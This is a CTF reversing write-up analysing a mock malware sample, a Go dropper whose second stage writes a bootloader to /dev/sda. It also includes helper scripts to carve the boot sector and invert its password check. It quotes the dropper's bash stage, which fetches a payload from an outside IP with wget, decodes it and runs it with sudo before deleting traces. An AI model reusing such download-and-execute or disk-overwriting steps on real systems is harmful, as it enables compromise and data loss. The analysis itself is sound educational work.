# [zer0pts CTF 2020] raindropper
###### tags: `zer0pts CTF` `reversing`
## Overview
We're given a 32-bit ELF.
The binary is written in Go and completely stripped. Analysing it statically is painful, so let's run it in a VM.

Nothing happens.
\*Disconnect the VM from the network before running real malware!
## Analysing "malware"
`strace` shows that the binary opens a socket. You can either capture the traffic or search the binary for an IP address.
```
$ strings malware | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
...bodyhttp://13.230.161.88:8033/raindropillegal...
```
`http://13.230.161.88:8033/raindrop` looks suspicious.
Downloading it gives the following script.
```bash
#!/bin/bash
if [ "$(whoami)" != "ImSureItsOnVM" ]; then
    echo "****** zer0pts CTF 2020 ******"
    echo "* *"
    echo "* You're not our target! *"
    echo "* *"
    echo "******************************"
else
    wget -nv -O /tmp/.malchan http://13.230.161.88:8033/malchan 1> /dev/null 2> /dev/null
    cat /tmp/.malchan | base64 -d > /tmp/.malchan.bin 2> /dev/null
    chmod +x /tmp/.malchan.bin 2> /dev/null
    sudo /tmp/.malchan.bin 2> /dev/null
    rm -f /tmp/.malchan.bin 2> /dev/null
    rm -f /tmp/.malchan 2> /dev/null
    rm -f /tmp/.raindrop 2> /dev/null
fi
```
Let's download `malchan` too.
## Analysing "malchan"
`malchan` is a very small binary, and static analysis alone is enough to understand it.
It just writes a bootloader to `/dev/sda`, and only when run as root. You can extract the embedded bootloader with a Python script or whatever tool you prefer.
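As an added example (not the author's script and not taken from `malchan`), here is a small Python carver that locates 512-byte legacy boot sectors in an arbitrary blob by their trailing `0x55 0xAA` signature and writes each candidate out for disassembly. The blob it scans is constructed inline for the demo; the heuristic is deliberately loose, so every hit should be confirmed by disassembling it as 16-bit code.

```python
# Added example: carve a legacy boot sector out of an arbitrary binary blob.
# A boot sector is 512 bytes and ends with the signature 0x55 0xAA at offset 510.
# The blob used below is CONSTRUCTED for the demo; it is not the real malchan.

SECTOR_SIZE = 512
BOOT_SIG = b"\x55\xaa"


def find_boot_sectors(blob: bytes) -> list:
    """Return every offset at which a 512-byte window ends with 0x55AA.

    The signature is only two bytes, so chance hits are possible in a large
    binary; confirm each candidate by disassembling it as 16-bit real-mode code.
    """
    hits = []
    pos = blob.find(BOOT_SIG)
    while pos != -1:
        start = pos - (SECTOR_SIZE - 2)   # signature sits at sector offset 510
        if start >= 0:
            hits.append(start)
        pos = blob.find(BOOT_SIG, pos + 1)
    return hits


def carve(blob: bytes, offset: int) -> bytes:
    """Return the 512-byte sector at `offset`, refusing anything that is not one."""
    sector = blob[offset:offset + SECTOR_SIZE]
    if len(sector) != SECTOR_SIZE or sector[510:] != BOOT_SIG:
        raise ValueError("no boot sector at offset 0x%x" % offset)
    return sector


def build_demo_blob() -> bytes:
    """Constructed stand-in for a binary with one embedded boot sector."""
    # Filler that never contains 0x55 0xAA adjacent: 0x55 is always followed by 0x56.
    filler = bytes(range(256)) * 4
    code = b"\xfa\x31\xc0\x8e\xd8\xf4"   # cli; xor ax,ax; mov ds,ax; hlt
    sector = code + b"\x00" * (510 - len(code)) + BOOT_SIG
    return filler + sector + filler


if __name__ == "__main__":
    blob = build_demo_blob()
    for off in find_boot_sectors(blob):
        sector = carve(blob, off)
        with open("bootsector_%x.bin" % off, "wb") as f:
            f.write(sector)
        print("boot sector candidate at 0x%x, first bytes %s" % (off, sector[:6].hex()))
```

Run against the real binary, replace `build_demo_blob()` with `open(path, "rb").read()`; the written `bootsector_*.bin` files can then be loaded into a disassembler as 16-bit code at origin `0x7c00`.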
## Analysing bootloader
The bootloader asks for user input and checks if it's correct.
```nasm
check:
    xor dx, dx          ; dl carries the previous encoded byte, starts at 0
    xor cx, cx
    mov si, password    ; user input
    mov di, spaghetti   ; expected (encoded) bytes
    mov cl, 0x29        ; 41 transformed bytes
.@Loop:
    lodsb               ; al = password[i]
    add al, dl          ; al += previous encoded byte
    ror al, 1           ; rotate right by one bit
    mov dl, al          ; remember the encoded byte for the next round
    scasb               ; compare al with spaghetti[i]
    jnz .@Error
    loop .@Loop
    lodsb               ; the 42nd byte is compared without transformation
    scasb
    jnz .@Error
    xor ax, ax          ; ax = 0: password correct
    ret
.@Error:
    xor ax, ax
    inc al              ; ax = 1: mismatch
    ret
```
The transform is easy to invert: because `dl` after each round is exactly the expected byte `spaghetti[i]`, each plaintext byte is `rol(spaghetti[i], 1) - spaghetti[i-1]` (with `spaghetti[-1] = 0`), and the 42nd byte is stored as-is. So we can easily decode the encoded flag.
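The following is an added Python model of the `check` routine above together with its inverse; it is not the author's solver. The real `spaghetti` table is not reproduced on this page, so the script encodes a constructed 41-byte sample to build a stand-in table and then recovers the sample from it.

```python
# Added example: Python model of the bootloader's `check` routine and its inverse.
# The real `spaghetti` table is not on this page, so a CONSTRUCTED 41-byte sample
# is encoded to produce a stand-in table and then recovered from it.

LOOP_LEN = 0x29  # cl = 0x29: 41 transformed bytes, then one byte compared raw


def ror8(x: int) -> int:
    """`ror al, 1` on an 8-bit register."""
    return ((x >> 1) | ((x & 1) << 7)) & 0xFF


def rol8(x: int) -> int:
    """Inverse of ror8 (`rol al, 1`)."""
    return ((x << 1) | (x >> 7)) & 0xFF


def encode(password: bytes) -> bytes:
    """Apply the loop body: al = ror(password[i] + dl, 1); dl = al."""
    out, dl = bytearray(), 0
    for b in password:
        dl = ror8((b + dl) & 0xFF)
        out.append(dl)
    return bytes(out)


def check(user_input: bytes, spaghetti: bytes) -> int:
    """Mirror of `check`: returns 0 when the input matches the table, 1 otherwise.

    The first LOOP_LEN bytes are transformed; the byte after them is compared raw.
    Inputs shorter than 42 bytes are treated as a mismatch in this model.
    """
    if len(user_input) < LOOP_LEN + 1 or len(spaghetti) < LOOP_LEN + 1:
        return 1
    if encode(user_input[:LOOP_LEN]) != spaghetti[:LOOP_LEN]:
        return 1
    return 0 if user_input[LOOP_LEN] == spaghetti[LOOP_LEN] else 1


def decode(table: bytes) -> bytes:
    """Invert the transform: dl before step i equals table[i-1] (0 for i = 0),
    so password[i] = rol(table[i], 1) - table[i-1]."""
    out, prev = bytearray(), 0
    for e in table:
        out.append((rol8(e) - prev) & 0xFF)
        prev = e
    return bytes(out)


def recover_password(spaghetti: bytes) -> bytes:
    """Decode the transformed prefix and keep the raw trailing byte."""
    return decode(spaghetti[:LOOP_LEN]) + spaghetti[LOOP_LEN:LOOP_LEN + 1]


# Constructed sample; the real flag is not on this page.
SAMPLE = b"zer0pts{constructed_sample_not_the_flag_}"
assert len(SAMPLE) == LOOP_LEN
SAMPLE_TABLE = encode(SAMPLE) + b"\x00"  # raw terminator checked by the final scasb

if __name__ == "__main__":
    print(recover_password(SAMPLE_TABLE))
```

To use it on the real bootloader, replace `SAMPLE_TABLE` with the 42 bytes found at the `spaghetti` label in the carved sector; `check()` then lets you confirm the recovered password offline before typing it into the VM.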